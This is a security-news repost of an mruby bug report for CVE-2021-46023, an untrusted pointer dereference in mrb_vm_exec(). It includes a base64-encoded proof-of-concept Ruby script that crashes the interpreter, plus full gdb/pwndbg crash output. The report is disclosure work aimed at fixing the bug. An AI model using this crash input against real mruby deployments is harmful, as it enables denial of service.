Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46023: Untrusted Pointer Dereference in mrb_vm_exec() · Issue #5613 · mruby/mruby

An Untrusted Pointer Dereference was discovered in function mrb_vm_exec in mruby before 3.1.0-rc. The vulnerability causes a segmentation fault and application crash.

CVE
#vulnerability#ubuntu#amd#ruby

Untrusted Pointer Dereference in mrb_vm_exec()****Description

An Untrusted Pointer Dereference was discovered in mrb_vm_exec(). The vulnerability causes a segmentation fault and application crash.

version

6de0fcb

./mruby -v
mruby 3.0.0 (2021-03-05)

System information
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

Proof of Concept

poc

base64 poc
Y2xhc3MgVmNsYXNzDQoJQEB2YXJyID0gWzE8MiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0
LDE1LDE2LDE3XQ0KCWRlZiB2YXJyDQoJCUBAdmFycg0KCWVuZA0KCWRlZiB0b19pJnQNCgkJQEB2
YXJyLmNsZWFyDQoJCTExDQoJZW5kDQplbmQNCg0Kb2JqID0gVmNsYXNzLm5ldw0KDQpwcmludCBv
YmoudmFyci5zaGlmdChvYmop

command:

Result

./mruby ./poc
[1]    283553 segmentation fault  ./mruby ./poc

gdb

Program received signal SIGSEGV, Segmentation fault.
mrb_vm_exec (mrb=<optimized out>, proc=<optimized out>, pc=0x55555561f7c3 <mrblib_proc_iseq_115+99> "/\006\003\001=\005\001%\377\331Q\006\002\001\a\004Q\b\003/\a\004\001<\006Q\a\004<\006\070\006") at /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h:139
139       return x;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────[ REGISTERS ]────────────────────────────────
 RAX  0x10
 RBX  0x38
 RCX  0x7
 RDX  0x0
 RDI  0x1
 RSI  0xffffffff
 R8   0x6
 R9   0x0
 R10  0x1
 R11  0x55555566fb08 ◂— 0x10
 R12  0x2eb
 R13  0x10
 R14  0x7
 R15  0x2f
 RBP  0x0
 RSP  0x7fffffffdad0 —▸ 0x55555565d2a0 —▸ 0x7fffffffdd50 ◂— 0x6
 RIP  0x55555557988e (mrb_vm_exec+2590) ◂— cmp    byte ptr [r13 + 0x10], 0x13
─────────────────────────────────[ DISASM ]─────────────────────────────────
 ► 0x55555557988e <mrb_vm_exec+2590>     cmp    byte ptr [r13 + 0x10], 0x13
   0x555555579893 <mrb_vm_exec+2595>     mov    rdx, r13
   0x555555579896 <mrb_vm_exec+2598>     ja     mrb_vm_exec+16844
     <mrb_vm_exec+16844>
    ↓
   0x55555557d03c <mrb_vm_exec+16844>    mov    rax, qword ptr [rdx]
   0x55555557d03f <mrb_vm_exec+16847>    jmp    mrb_vm_exec+1400
    <mrb_vm_exec+1400>
    ↓
   0x5555555793e8 <mrb_vm_exec+1400>     lea    rcx, [rsp + 0x268]
   0x5555555793f0 <mrb_vm_exec+1408>     mov    rdi, qword ptr [rsp]
   0x5555555793f4 <mrb_vm_exec+1412>     mov    edx, r12d
   0x5555555793f7 <mrb_vm_exec+1415>     mov    qword ptr [rsp + 0x268], rax
   0x5555555793ff <mrb_vm_exec+1423>     mov    rsi, rcx
   0x555555579402 <mrb_vm_exec+1426>     mov    qword ptr [rsp + 0x70], rcx
─────────────────────────────[ SOURCE (CODE) ]──────────────────────────────
In file: /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h
   134 static inline union mrb_value_
   135 mrb_val_union(mrb_value v)
   136 {
   137   union mrb_value_ x;
   138   x.value = v;
 ► 139   return x;
   140 }
   141
   142 MRB_API mrb_value mrb_word_boxing_cptr_value(struct mrb_state*, void*);
   143 #ifndef MRB_NO_FLOAT
   144 MRB_API mrb_value mrb_word_boxing_float_value(struct mrb_state*, mrb_float);
─────────────────────────────────[ STACK ]──────────────────────────────────
00:0000│ rsp 0x7fffffffdad0 —▸ 0x55555565d2a0 —▸ 0x7fffffffdd50 ◂— 0x6
01:0008│     0x7fffffffdad8 —▸ 0x55555561f7c3 (mrblib_proc_iseq_115+99) ◂— 0x2501053d0103062f
02:0010│     0x7fffffffdae0 —▸ 0x55555564c2a0 (mrblib_proc_irep_115) ◂— 0x30000000b0006
03:0018│     0x7fffffffdae8 —▸ 0x55555561f7f0 (mrblib_proc_syms_115) ◂— 0x36700000125
04:0020│     0x7fffffffdaf0 —▸ 0x7fffffffdd50 ◂— 0x6
05:0028│     0x7fffffffdaf8 —▸ 0x55555567be90 —▸ 0x55555567be60 —▸ 0x55555567be48 ◂— 0x1a
06:0030│     0x7fffffffdb00 ◂— 0x1
07:0038│     0x7fffffffdb08 —▸ 0x55555566a2b0 ◂— 0x0
───────────────────────────────[ BACKTRACE ]────────────────────────────────
 ► f 0   0x55555557988e mrb_vm_exec+2590
   f 1   0x55555558300b mrb_vm_run+155
   f 2   0x555555584ed5 mrb_top_run+133
   f 3   0x5555555c7540 mrb_load_exec+752
   f 4   0x5555555c92b0 mrb_load_detect_file_cxt+400
   f 5   0x5555555756de main+1486
   f 6   0x7ffff7c980b3 __libc_start_main+243
────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  mrb_vm_exec (mrb=<optimized out>, proc=<optimized out>, pc=0x55555561f7c3 <mrblib_proc_iseq_115+99> "/\006\003\001=\005\001%\377\331Q\006\002\001\a\004Q\b\003/\a\004\001<\006Q\a\004<\006\070\006") at /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h:139
#1  0x000055555558300b in mrb_vm_run (mrb=0x55555565d2a0, proc=proc@entry=0x555555661b50, self=..., stack_keep=0) at /home/aidai/fuzzing/mruby/mruby-master/src/vm.c:1091
#2  0x0000555555584ed5 in mrb_top_run (mrb=mrb@entry=0x55555565d2a0, proc=proc@entry=0x555555661b50, self=..., stack_keep=stack_keep@entry=0) at /home/aidai/fuzzing/mruby/mruby-master/src/vm.c:3050
#3  0x00005555555c7540 in mrb_load_exec (mrb=mrb@entry=0x55555565d2a0, p=p@entry=0x55555567aa10, c=c@entry=0x555555679940) at mrbgems/mruby-compiler/core/parse.y:6881
#4  0x00005555555c92b0 in mrb_load_detect_file_cxt (mrb=0x55555565d2a0, fp=0x555555679740, c=0x555555679940) at mrbgems/mruby-compiler/core/parse.y:6794
#5  0x00005555555756de in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe248) at /home/aidai/fuzzing/mruby/mruby-master/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
#6  0x00007ffff7c980b3 in __libc_start_main (main=0x555555575110 <main>, argc=2, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238) at ../csu/libc-start.c:308
#7  0x0000555555575a5e in _start () at /home/aidai/fuzzing/mruby/mruby-master/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:282

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907